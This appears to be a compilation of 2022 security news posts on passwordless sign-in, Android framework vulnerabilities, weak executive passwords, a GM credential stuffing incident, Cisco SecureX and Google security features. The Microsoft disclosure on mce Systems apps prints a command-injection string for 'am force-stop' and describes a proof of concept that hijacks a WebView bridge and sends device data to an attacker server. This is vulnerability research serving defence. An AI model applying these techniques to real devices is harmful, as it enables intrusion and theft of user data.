When we first introduced passwordless sign-in for Azure AD (work or school accounts), Microsoft Authenticator could only support one passwordless account at a time. Now that limitation has been removed and you can have as many as you want. iOS users will start to see this capability later this month and the feature will be available on Android afterwards.  

thumbnail image 2 captioned Passwordless phone sign in experience in Microsoft Authenticator for Azure AD accounts.Passwordless phone sign in experience in Microsoft Authenticator for Azure AD accounts.

Temporary Access Pass in Azure AD 

Temporary Access Pass in Azure AD, a time-limited passcode, has been a huge hit with enterprises since the public preview, and we’ve been adding more ways to use it as we prepare to release the feature this summer. Lots of customers have told us they want to distribute Temporary Access Passes instead of passwords for setting up new Windows devices. You’ll be able to use a Temporary Access Pass to sign in for the first time, to configure Windows Hello, and to join a device to Azure AD. This update will be available next month. 

thumbnail image 3 captioned End user experience for Temporary Access Pass in Windows 11 onboarding.End user experience for Temporary Access Pass in Windows 11 onboarding.

Customers implementing passwordless today 

We already have several great examples of large Microsoft customers implementing passwordless solutions, including Avanade, who went passwordless with help from Feitian to protect their clients’ data against security breaches. Amedisys, a home healthcare and hospice care provider, went passwordless to keep patient personal information secured. Both organizations are committed to using passwordless authentication not only to strengthen security, but also to make the sign-in experience easier for end users. 

We’d love to hear your feedback, so please leave a comment, check out the documentation, and visit aka.ms/gopasswordless for more information. 

Best regards,  

Alex Simons (Twitter: @Alex_A_Simons

Corporate Vice President of Program Management 

Microsoft Identity Division 

Source :
https://techcommunity.microsoft.com/t5/azure-active-directory-identity/expansion-of-fido-standard-and-new-updates-for-microsoft/ba-p/3290633

Android apps with millions of downloads exposed to high-severity vulnerabilities

Microsoft uncovered high-severity vulnerabilities in a mobile framework owned by mce Systems and used by multiple large mobile service providers in pre-installed Android System apps that potentially exposed users to remote (albeit complex) or local attacks. The vulnerabilities, which affected apps with millions of downloads, have been fixed by all involved parties. Coupled with the extensive system privileges that pre-installed apps have, these vulnerabilities could have been attack vectors for attackers to access system configuration and sensitive information.

As it is with many of pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device. We worked with mce Systems, the developer of the framework, and the affected mobile service providers to solve these issues. We commend the quick and professional resolution from the mce Systems engineering teams, as well as the relevant providers in fixing each of these issues, ensuring that users can continue using such a crucial framework.

Collaboration among security researchers, software vendors, and the security community is important to continuously improve defenses for the larger ecosystem. As the threat and computing landscape continues to evolve, vulnerability discoveries, coordinated response, and other forms of threat intelligence sharing are paramount to protecting customers against present and future threats, regardless of the platform or device they are using.

Uncovering the vulnerabilities

Our research on the framework vulnerabilities began while trying to better understand how a pre-installed System application could affect the overall security of mobile devices. We discovered that the framework, which is used by numerous apps, had a “BROWSABLE” service activity that an attacker could remotely invoke to exploit several vulnerabilities that could allow adversaries to implant a persistent backdoor or take substantial control over the device.

The framework seemed to be designed to offer self-diagnostic mechanisms to identify and resolve issues impacting the Android device, indicating its permissions were inherently broad with access to valuable resources. For example, the framework was authorized to access system resources and perform system-related tasks, like adjusting the device’s audio, camera, power, and storage controls. Moreover, we found that the framework was being used by default system applications to leverage its self-diagnostic capabilities, demonstrating that the affiliated apps also included extensive device privileges that could be exploited via the vulnerable framework.

According to mce Systems, some of these vulnerabilities also affected other apps on both Android and iOS devices. Moreover, the vulnerable framework and affiliated apps were found on devices from large international mobile service providers. mce Systems, which offers “Mobile Device Lifecycle and Automation Technologies,” also permitted providers to customize and brand their respective mobile apps and frameworks. Pre-installed frameworks and mobile apps such as mce Systems’ are beneficial to users and providers in areas like simplifying the device activation process, troubleshooting device issues, and optimizing performance. However, their extensive control over the device to deliver these kinds of services could also make them an attractive target for attackers. 

Our analysis further found that the apps were embedded in the devices’ system image, suggesting that they were default applications installed by phone providers. All of the apps are available on the Google Play Store where they go through Google Play Protect’s automatic safety checks, but these checks previously did not scan for these types of issues. As part of our effort to help ensure broad protection against these issues, we shared our research with Google, and Google Play Protect now identifies these types of vulnerabilities.

We initially discovered the vulnerabilities in September 2021 and shared our findings with mce Systems and affected mobile service providers through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). We worked closely with mce Systems’ security and engineering teams to mitigate these vulnerabilities, which included mce Systems sending an urgent framework update to the impacted providers and releasing fixes for the issues. At the time of publication, there have been no reported signs of these vulnerabilities being exploited in the wild.

The high-severity vulnerabilities, which have a Common Vulnerability Scoring System (CVSS) score of 7.0-8.9, are now identified as CVE-2021-42598CVE-2021-42599CVE-2021-42600, and CVE-2021-42601. We want to thank mce Systems’ engineering teams for collaborating quickly and efficiently in resolving these issues as well as to AT&T for proactively working with Microsoft to ensure customers can safely continue to use the framework.

Several other mobile service providers were found using the vulnerable framework with their respective apps, suggesting that there could be additional providers still undiscovered that may be impacted. The affected providers linked below have made updated app versions available to users before this disclosure, ensuring devices can be protected before these vulnerabilities could be exploited. We encourage these providers’ customers to update to the latest versions of these apps from the Google Play store, which include but are not limited to: com.telus.checkupcom.att.dhcom.fivemobile.myaccountcom.freedom.mlp,uat, and com.ca.bell.contenttransfer.

Additionally, the package com.mce.mceiotraceagent might be installed by several mobile phone repair shops. Mobile users are advised to look for that app name and remove it from their phone, if found.

Analyzing apps that use the mce framework

App manifest and permissions

When analyzing an Android application, the first thing that comes to mind is checking its manifest, maintained under the AndroidManifest.xml file. The manifest describes the application itself and its components, such as the following:

  • Permissions (for example, camera access, internet access, and others)
  • Activities and how they respond to Intents sent to them
  • Content providers
  • Receivers and the kind of content they expect to receive
  • Services

Checking the manifest of an app affiliated with mce Systems’ framework shed light on some of its features and capabilities but did not immediately indicate that any vulnerabilities or security issues were present. Therefore, further research into the app’s functionality was needed by understanding its permissions.

Analysis of the app’s permissions on the mobile device revealed authorizations that could lead to powerful access and capabilities for an attacker. Those permissions included control over the following:

  • Networking: access the internet, modify Wi-Fi state, network state, NFC, and Bluetooth
  • File access: read and write to the external storage
  • Peripherals: access the camera, record audio, get fingerprint information, and get the device’s physical location
  • Private information: read phone numbers, account information, and contacts
  • Management: install apps and modify device settings

With access to these valuable resources, the app could be abused by an attacker to implant a persistent backdoor on the device.

BROWSABLE activities

The “Activities” section of the app’s manifest detailed that the Intent-filter element included activities with a “BROWSABLE” category. While most Intents do not require a category, category strings detail the components that should handle the Intent. In particular, the BROWSABLE category allows the target Activity to be triggered from a web browser to display data referenced by a link, like an image. BROWSABLE activities appeal to attackers as the latter can exploit them via malicious web pages and other Intent-based attacks.

Figure 1:  BROWSABLE Activity with the “mcedigital://” scheme

The Intent-filter element in the manifest dictates how the Activity can be triggered. In the app’s case, the Activity could be triggered by simply clicking a link with the “mcedigital://” scheme. This would start the com.mce.sdk.AppActivity Activity with an Intent with arbitrary data (besides the scheme).

Digging deeper: Reviewing the mce framework’s main functionality

We reviewed the effects of triggering the com.mce.sdk.AppActivity. Also known as appActivity, this Activity refers to the different functionalities provided by the app. AppActivity extends Activity and therefore has an onCreate method, which traditionally handles the creating Intent.

AppActivity

Here’s a brief description of AppActivity:

  1. AppActivity has a member called “webView” and type “JarvisWebView,” a specialized class that extends WebView.
  2. Upon creation, AppActivity has some optional display choices from the Intent (if they exist) and then loads a predefined web page to the WebView. That predefined page can get arbitrary query parameters from the Intent’s data; that is, everything after a “\?” will be added to the web page.

Thus, if a user clicks this:

mcedigital://ignored\?arbitrary_params

The App’s WebView loads the following web page:

file:///android_asset/applications/user/reflow-container-bundled/index.html?arbitrary_params

The app’s index.html web page (which is an asset built into the Android app) loads two JavaScript files:

  • config.js: a nonexistent file
  • bundle.js: contains much of the app’s logic

Since we wanted to understand the interplay between bundle.js (JarvisJSInterface) and the WebView (JarvisWebView), we analyzed both.

JarvisWebView and JarvisJSInterface

The main features of the WebView, JarvisWebView class, are the following:

A JavaScript Interface is a conspicuous target to look for security issues, as it uses a JavaScript Bridge to allow invoking specific methods inside an Android app. In the case of JarvisJSInterface, three methods are exported:

  • init(String): takes a string that will be used as a JavaScript callback method; in our case, it will always be window.AndroidCallback
  • windowClose(): runs a callback registered by the Android app
  • request(String): sends a service request from the JavaScript client to the server (Android app)

The request method is by far the most interesting, as it performs the following:

  1. Interprets the given string as a JSON object
  2. Extracts the following pieces from the JSON object:
    • Context: a random GUID generated by the client, used to link requests and responses
    • Service: the service we are about to call to
    • Command: an integer
    • Data: optional parameters sent to the service call
  3. Invokes the method serviceCall, which finds the registered service, gets the method based on the command number, and eventually invokes that method using Java reflection
Figure 2: Service::callServiceMethod

The serviceCall is a powerful method, as it allows the WebView to invoke “services” freely. But what are these services, exactly?

Services offered by the mce framework

After we examined the services offered by this framework per the app manifest, we then obtained a list of services that practically give the WebView complete control over the device. The most notable services include:

  • Audio: access and manipulate volume levels, as well as play a tone with a given duration and frequency
  • Camera: take a silent snapshot
  • Connectivity: control and obtain valuable information from NFC, Wi-Fi, and Bluetooth
  • Device: includes various device controlling mechanisms like battery drainage, performing a factory reset, and obtaining information on apps, addresses, sensor data, and much more
  • Discovery: set the device to discoverable
  • Location: obtain the location in various modes and set the location state
  • PackageManager: acquire package info and silently install a new app
  • Power: obtain charging state
  • Sensor: acquire sensor data such as barometer data, light data, proximity data, and whether fingerprinting is working
  • Storage: obtain content such as documents, media, images, and videos

These services inherit from a base class named “Service” and implement two methods:

  • setServiceName: for service identification purposes
  • setServiceMethodMap: for setting up the mapping between the command integer and the method name, argument names, and argument types

For example, here is the Camera service setting its methods:

  • Method 0 is “getCameraList” and expects no arguments.
  • Method 1 is “captureStillImageNoPreview” and expects one String argument.
Figure 3: The Camera service setting its methods

Vulnerability findings

Based on our analysis of the mce framework, we discovered several vulnerabilities. It should be noted that while mobile service providers can customize their apps respective to mce framework so as not to be identical, the vulnerabilities we discovered can all be exploited in the same manner—by injecting code into the web view. Nonetheless, as their apps and framework customization use different configurations and versions, not all providers are necessarily vulnerable to all the discovered vulnerabilities.

Outdated command-injection vulnerability (CVE-2021-42599)

We found a command-injection vulnerability, tracked as CVE-2021-42599, in the Device service mentioned in the previous section. This service offers rich functionality, including the capability to stop activities of a given package. The client fully controls the argument “value,” and simply runs the following command:

am force-stop "value"

Since the argument is not sanitized, an attacker could add backticks or quotation marks to run arbitrary code, like the following:

am force-stop "a"; command-to-run; echo "a"
Figure 4: Command injection proof-of-concept (POC) exploit code implemented in the Device service

According to mce Systems, they have since removed the functionality behind this vulnerability and it is no longer present in more advanced framework versions.

Exploitation by JavaScript injection with PiTM in certain apps

The services offered by the mce framework further indicated that the following vulnerability resided in the logic of the JavaScript client for apps that are configured to enable plaintext communications such as the app that we initially analyzed. Interestingly, the code for the client is a heavily-obfuscated dynamic JavaScript code that is implemented over several files, mainly bundle.js. Due to the blind trust between the JavaScript client and the JarvisJSInterface server, an attacker who could inject JavaScript contents into the WebView would inherit the permissions that the app already has.

We conceived two injection strategies most likely to be leveraged by attackers:

  1. Affect the JavaScript client behavior by supplying specific GET parameters from the BROWSABLE Intent.
  2. Trigger an app with the BROWSABLE Intent to become a person-in-the-middle (PiTM) and view the device’s entire traffic. Inject JavaScript code if the client ever tries to fetch external content and interpret it as a script or HTML.

Once we reverse-engineered the client’s obfuscated code, we discovered that it could not inject JavaScript from the GET parameters. The only capability permitted was to affect some of the client’s self-tests upon initialization, such as a battery-draining test or a Wi-Fi connectivity test. However, the WebView-fetched plaintext pages that we discovered could be injected into with a PiTM attack.

Our proof-of-concept (POC) exploit code was therefore:

  1. Perform a PiTM for the target device and lure the user into clicking a link with the “mcesystems://” schema.
  2. Inject JavaScript into one of the plaintext page responses that does the following:
    • Hijack the JavaScript interface by calling init with our callback method
    • Use the JavaScript interface request method to get servicing
    • Send the data to our server for information gathering using XHR (XMLHttpRequest)
Figure 5: Injecting a similar JavaScript code to the WebView could allow an attacker to call arbitrary services and methods

Local elevation of privilege with deserialization followed by injection (CVE-2021-42601)  

Some of the apps we analyzed did not pull plaintext pages. Thus, we looked for a local elevation of privilege vulnerability, allowing a malicious app to gain the system apps’ privileges, tracked as CVE-2021-42601.

In the apps mentioned above, we discovered that the main Activity attempted to handle a deep link (a link that launches an app instead of a browser on click) with Google Firebase. Interestingly, this deep-link handling tried to deserialize a structure called PendingDynamicLinkData (representing a link) from an Intent Extra byte array with the key com.google.firebase.dynamiclinks.DYNAMIC_LINK_DATA. This structure was used later by the mce framework to generate various JSON Objects that might contain data from a categoryId query parameter in the original link, and eventually ended up in the member mFlowSDKInput to be injected into the JarvisWebView instance in an unsafe way:

Figure 6: Unsanitized JavaScript loading allowed arbitrary code injection to the WebView

Since the categoryId query parameter might contain apostrophes, one could inject arbitrary JavaScript code into the WebView. We decided to inject a code that would reach out to a server and load a second-stage code, which was the exact one we used for our PiTM scenario.

Figure 7: Local injection POC exploit

Software design against JavaScript injection vulnerabilities

We worked closely with the mce Systems engineering team and discovered that the reason for unsafe loadUrl invocations with JavaScript injections was that the framework used an asynchronous model of operation. When the JavaScript client performs a request, it expects to be notified later when there are results. Since Android JavaScript Bridge only allows primitive types to be sent (for example, Strings), the mce framework notified the JavaScript client by injecting JavaScript with potentially unsafe arguments (the results themselves).

We offered mce Systems a slightly different software design that prevents unsafe JavaScript injection. The description of the flow of information in our proposal is as follows:

  1. The JavaScript client invokes the request method on the Android JavaScript Bridge, supplying the request itself along with a request ID.
  2. The Java server performs the request and stores the result in a cache. The said cache then maps request IDs to results.
  3. The Java server notifies the client by carefully injecting the JavaScript loadUrl(“javascript:window.onMceResult(<requestID>);”) into the WebView. Note that the only non-constant string is the request ID, which can easily be sanitized. This method “wakes the client up”
  4. The JavaScript client implementation of onMceResult invokes the Android JavaScript Bridge with the method String fetchResult(String requestId). Note that this method returns a string (which contains the result).

This way, the JavaScript client does not need to poll for asynchronous results while data is safely transferred between the client and the server.

Interestingly, Google AndroidX offers a very similar API: webMessageListener. While the said API works quite similarly to our suggestion, it only supports Android versions greater than Lollipop. Thus, the new mce framework now checks the Android version and uses this new Google API if supported or our offered solution for older devices.

The above is just one example of our collaboration to help secure our cross-platform ecosystem. According to mce Systems, all of our reported vulnerabilities were addressed.

Improving security for all through threat intelligence sharing and research-driven protections

Microsoft strives to continuously improve security by collaborating with customers, partners, and industry experts. Responding to the evolving threat landscape requires us to expand our capabilities into other devices and non-Windows platforms in addition to further coordinating research and threat intelligence sharing among the larger security community. This case highlighted the need for expert, cross-industry collaboration to effectively mitigate issues.

Moreover, collaborative research such as this informs our seamless protection capabilities across platforms. For example, intelligence from this analysis helped us ensure that Microsoft Defender Vulnerability Management can identify and remediate devices that have these vulnerabilities, providing security operations teams with comprehensive visibility into their organizational exposure and enabling them to reduce the attack surface. In addition, while we’re not aware of any active exploitation of these mobile vulnerabilities in the wild, Microsoft Defender for Endpoint’s mobile threat defense capabilities significantly improve security on mobile devices by detecting potential exploits, malware, and post-exploitation activity.

We will continue to work with the security community to share intelligence about threats and build better protection for all. Microsoft security researchers continually work to discover new vulnerabilities and threats, turning a variety of wide-reaching issues into tangible results and improved solutions that protect users and organizations across platforms every single day. Similarly inquisitive individuals are encouraged to check opportunities to join the Microsoft research team here: https://careers.microsoft.com/.  

Jonathan Bar Or, Sang Shin Jung, Michael Peck, Joe Mansour, and Apurva Kumar
Microsoft 365 Defender Research Team

Source :
https://www.microsoft.com/security/blog/2022/05/27/android-apps-with-millions-of-downloads-exposed-to-high-severity-vulnerabilities/

Why you should act like your CEO’s password is “qwerty”

A poor password at the highest levels of an organisation can cost a company millions in losses.

Recent findings show that half of IT leaders store passwords in shared documents. On top of that, it seems that folks at executive level are not picking good passwords either. Researchers from NordPass combed through a large list of CEO and business owner breaches. Their findings should renew considerations for additional security measures at executive level.

The findings

The five most common passwords among C-level executives, managers, and business owners were “123456”, “password”, “12345”, “123456789”, and our old friend “qwerty”. Terrifyingly, but perhaps not surprisingly, this looks exactly like every other list of the most frequently used passwords, suggesting no extra precautions are in place (or enforced) at the top.

Executives really love to use the names “Tiffany”, “Charlie”, Michael”, and “Jordan” for their passwords. I was curious to know if these are the names of executives’ name their kids. My entirely unscientific trawl for the names of CEO’s children turned up list of CEOs themselves. Henry, William, Jack, James, and David are all very popular names. This doesn’t match up with our list of password names. However, there is one list which claims that the Michaels of this world are most likely to become CEOs. Are CEOs naming their passwords after themselves? I’d like to think not, but then I probably wouldn’t have expected to be writing about “123456” either.

Animals and mythical creatures are popular choices. When not naming passwords after themselves, dragons and monkeys are both incredibly popular and also incredibly easy to guess.

Breaking and entering

Common ways corporate breaches and basic passwords spill all over the floor are issues we’ve covered at length. We recently highlighted recommendations from the Cybersecurity and Infrastructure Security Agency which deal with most of the causes of CEO password loss.

A combination of weak and reused passwords, and risky password-sharing habits make up the majority of hits on the “these passwords can lead to nothing good” indicator.

What happens when you combine bad password practices with human error and poor security infrastructure? These weak and obvious passwords just help to bring the whole thing crashing down that little bit faster.

There are some very smart attacks and compromises out there. Clever attackers can exfiltrate data from a network for weeks or months before making a more overt move. You’d expect people hijacking CEO data to be made to really work for it at every level. Sadly this research seems to suggest the opposite is happening in a lot of cases.

If nothing else, I’d love to see the actual response on the part of the criminals. What do they think when pulling down a C-Level executive’s data and discovering their email password is “sandwich”? Are they surprised? Is it business as usual? Do they think it can’t possibly be real, and they’re staring down the wrong end of a prank or law enforcement bust?

Is the CEO password sky falling? A word of caution…

There are some caveats here. The research doesn’t go into detail with regard to additional security measures in place. Yes, a CEO may have the worst password you’ve ever seen. That doesn’t mean the business has been popped right open.

Maybe they had two-factor authentication (2FA) set up. The password may be gone, but unless the attacker also has access to the CEO’s authentication app on their phone, it may not be much use. The CEO may use a hardware authentication token plugged into their desktop. Admins may have set up that one machine specifically for use by the CEO, for all CEO-related activity. It may not be usable remotely, and could be tied to a VPN an added precaution.

Having said all of that

Manager? Use a password manager

If we’re talking purely about fixing the short, terrible, obvious passwords, then some additional work is required. 2FA, lockouts, and hardware tokens are great. Ultimately they’re fixing a myriad of additional problems regardless of whether the password is good or bad.

To fix bad password practices, we need to look to tools which can improve them and help keep them a bit more secure at the same time. I am talking about password managers, of course.

A password manager is a software application that gets around the twin evils of poor passwords and password reuse by creating strong, random passwords and then remembering them.

They can function online, so they are accessible via the web and can sync passwords between devices, or they can work entirely offline. Offline password managers are arguably more secure. Online components can add additional risk factors and a way for someone to break in via exploits. The important part is to keep the master password to access your vault secure, and to use 2FA if available for an additional layer of protection. Make your master password long and complex—don’t use “qwerty”.

Password managers with browser extensions can help deter phishing. Your password manager will object to entering a password into the wrong website, no matter how convincing it looks. No more risk of accidental logins!

Some password manager tools allow you to share logins with other users in a secure fashion. They don’t show or display the password to the other users, rather they just grant a form of access managed by the tool or app itself. If your CEO has no option but to share a password with somebody else, this is the only safe way to do it.

There’s never been a better time to wean ourselves away from shared password documents and the name “Michael” as the digital keys to an organisation’s kingdom. It’s perhaps time for CEOs and other executives to lead from the front where security is concerned.

Source :
https://blog.malwarebytes.com/malwarebytes-news/2022/05/why-you-should-act-like-your-ceos-password-is-querty/

General Motors suffers credential stuffing attack

American car manufacturer General Motors (GM) says it experienced a credential stuffing attack last month. During the attack customer information and reward points were stolen.

The subject of the attack was an online platform, run by GM, to help owners of Chevrolet, Buick, GMC, and Cadillac vehicles to manage their bills, services, and redeem rewards points.

Credential stuffing

Credential stuffing is a special type of brute force attack where the attacker uses existing username and password combinations, usually ones that were stolen in a data breach on another service.

The intention of such an attack is not to take over the website or platform, but merely to get as many valid user account credentials and use that access to commit fraud, or sell the valid credentials to other criminals.

To stop a target from just blocking their IP address, an attacker will typically use rotating proxies. A rotating proxy is a proxy server that assigns a new IP address from the proxy pool for every connection.

The attack

GM disclosed that it detected the malicious login activity between April 11 and April 29, 2022, and confirmed that the threat actors exchanged customer reward bonuses of some customers for gift certificates.

The My GM Rewards program allows members to earn and redeem points toward buying or leasing a new GM vehicle, as well as for parts, accessories, paid Certified Service, and select OnStar and Connected Services plans.

GM says it immediately investigated the issue and notified affected customers of the issues.

Victims

GM contacted victims of the breach, advising them to follow instructions to recover their GM account. GM is also forcing affected users to reset their passwords before logging in to their accounts again. In the notification for affected customers, GM said it will be restoring rewards points for all customers affected by this breach.

GM specifically pointed out that the credentials used in the attack did not come from GM itself.

“Based on the investigation to date, there is no evidence that the log in information was obtained from GM itself. We believe that unauthorized parties gained access to customer login credentials that were previously compromised on other non-GM sites and then reused those credentials on the customer’s GM account.”

Stolen information

Attackers could have accessed the following Personally Identifiable Information (PII) of a compromised user:

  • First and last name
  • Email address
  • Physical address
  • Username and phone number for registered family members tied to the account
  • Last known and saved favorite location information
  • Search and destination information

Other information that was available was car mileage history, service history, emergency contacts, Wi-Fi hotspot settings (including passwords), and currently subscribed OnStar package (if applicable).

GM is offering credit monitoring for a year.

Mitigation

What could GM have done to prevent the attack? It doesn’t currently offer multi-factor authentication (MFA)which would have stopped the attackers from gaining access to the accounts. GM does ask customers to add a PIN for all purchases.

This incident demonstrates how dangerous it is to re-use your passwords for sites, services and platforms. Even if the account doesn’t seem that important to you, the information obtainable by accessing the account could very well be something you wish to keep private.

Always use a different password for every service you use, and consider using a password manager to store them all. You can read some more of our tips on passwords in our blog dedicated to World Password Day.

Stay safe, everyone!

Source :
https://blog.malwarebytes.com/reports/2022/05/general-motors-suffers-credential-stuffing-attack/

New in SecureX: Device Insights

Since its release, Cisco SecureX has helped over 10,000 customers gain better visibility into their infrastructure. As the number of devices in many customer environments continues to increase, so does the number of products with information about those devices. Between mobile device managers (MDM), posture agents, and other security products, a wealth of data is being collected but is not necessarily being shared or, more importantly, correlated. With the new device insights feature in Cisco SecureX, now available for all SecureX customers, we’re changing that.

Introducing Device Insights

Device insights, which is now generally available, extends our open, platform approach to SecureX by allowing you to discover, normalize, and consolidate information about the devices in your environment. But this isn’t just another dashboard pulling data from multiple sources. Device insights fetches data from sources you might expect, like your mobile device manager, but also leverages the wealth of data available in your Cisco Secure products such as Cisco Secure Endpoint, Orbital, Duo, and Umbrella. Combining these sources of data allows you to discover devices that may be sneaking through gaps in your normal device management controls and gain a comprehensive view into each device’s security posture and management status. With device insights, you’ll be able to answer these all-important questions:

  • What types of devices are connected in our environment?
  • What users have been accessing those devices?
  • Where are those devices located?
  • What vulnerabilities are associated with each device?
  • Which security agents are installed?
  • Is the security software is up to date?
  • What context do we have from technologies beyond the endpoint?

Supported Data Sources

Now, you might ask: what types of data can I bring into device insights? When we created SecureX, we built a flexible architecture based on modules that anyone can create. Device insights extends this architecture by adding a new capability to our module framework. Here’s a look at what data sources will be supported at launch:

Bringing Everything Together

Once you’ve enabled your data sources, device insights will periodically retrieve data from each source and get to work. Some sources can also publish data in real time to device insights using webhooks. We normalize all of the data and then correlate it between sources so you have one view into each of your devices, not a mess of duplicate information. This results in a single, unified dashboard with easy filtering, a high level view into your environment, and a customizable table of devices (which you can export too!). To see more information about a device, just click on one and you’ll see everything device insights knows, including which source provided which data.

screenshot: SecureX device status dashboard
screenshot: SecureX device detail view

Getting Started

To get started with device insights, simply log into Cisco SecureX and click the new Insights tab! For more information about device insights, check out these resources:

High-Severity Bug Reported in Google’s OAuth Client Library for Java

Google last month addressed a high-severity flaw in its OAuth client library for Java that could be abused by a malicious actor with a compromised token to deploy arbitrary payloads.

Tracked as CVE-2021-22573, the vulnerability is rated 8.7 out of 10 for severity and relates to an authentication bypass in the library that stems from an improper verification of the cryptographic signature.

Credited with discovering and reporting the flaw on March 12 is Tamjid Al Rahat, a fourth-year Ph.D. student of Computer Science at the University of Virginia, who has been awarded $5,000 as part of Google’s bug bounty program.

“The vulnerability is that the IDToken verifier does not verify if the token is properly signed,” an advisory for the flaw reads.

“Signature verification makes sure that the token’s payload comes from a valid provider, not from someone else. An attacker can provide a compromised token with custom payload. The token will pass the validation on the client side.”

The open-source Java library, built on the Google HTTP Client Library for Java, makes it possible to obtain access tokens to any service on the web that supports the OAuth authorization standard.

Google, in its README file for the project on GitHub, notes that the library is supported in maintenance mode and that it’s only fixing necessary bugs, indicative of the severity of the vulnerability.

Users of the google-oauth-java-client library are recommended to update to version 1.33.3, released on April 13, to mitigate any potential risk.

Source :
https://thehackernews.com/2022/05/high-severity-bug-reported-in-googles.html

Android and Chrome Users Can Soon Generate Virtual Credit Cards to Protect Real Ones

Google on Wednesday took to its annual developer conference to announce a host of privacy and security updates, including support for virtual credit cards on Android and Chrome.

“When you use autofill to enter your payment details at checkout, virtual cards will add an additional layer of security by replacing your actual card number with a distinct, virtual number,” Google’s Jen Fitzpatrick said in a statement.

The goal, the search giant, said to keep payment information safe and secure during online shopping and protect users from skimming attacks wherein threat actors inject malicious JavaScript code to plunder credit card numbers and sell them on the black market.

The feature is expected to roll out in the U.S. for Visa, American Express, Mastercard, and Capital One cards starting this summer.

Interestingly, while Apple offers an option to mask email addresses via Hide My Email, which enables users to create unique, random email addresses to use with apps and websites, it’s yet to offer a similar option for creating virtual credit cards.

The development comes a week after Google, Apple, and Microsoft banded together to accelerate support for a common passwordless sign-in standard that allows “websites and apps to offer consistent, secure, and easy passwordless sign-ins to consumers across devices and platforms.”

Additionally, Google said it’s expanding phishing protections in Google Workspace to Docs, Slides and Sheets, and that it plans to debut a new “My Ad Center” later this year to give users more control over personalized ads on YouTube, Search, and Discover feed.

What’s more, users would be able to request personally identifiable information such as email, phone number, or home address to be removed from search results through a new tool that will be accessible from the Google App.

Also coming is a new Account Safety Status setting that will “feature a simple yellow alert icon on your profile picture that will flag actions you should take to secure your account.”

Other key privacy and security features unveiled at Google I/O 2022 include support for end-to-end encryption for group conversations in the Messages app for Android and the availability of on-device encryption for Google Password Manager.

Source :
https://thehackernews.com/2022/05/blog-post.html

Exit mobile version